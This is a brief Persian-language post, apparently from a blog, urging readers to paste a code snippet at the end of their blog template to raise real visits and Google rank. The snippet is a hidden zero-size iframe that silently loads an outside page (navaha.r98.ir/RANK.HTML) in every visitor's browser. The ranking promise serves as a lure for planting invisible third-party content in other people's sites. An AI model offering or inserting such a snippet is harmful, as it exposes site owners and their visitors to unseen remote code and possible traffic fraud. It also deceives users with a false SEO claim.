جهت افزایش بازدید واقعی ورنک گوگل خود کد زیر رادر وبلاگ خو درپایان قالب پیست کنید
<iframe width="0" scrolling="no" height="0" frameborder="0" src="http://navaha.r98.ir/RANK.HTML"></iframe>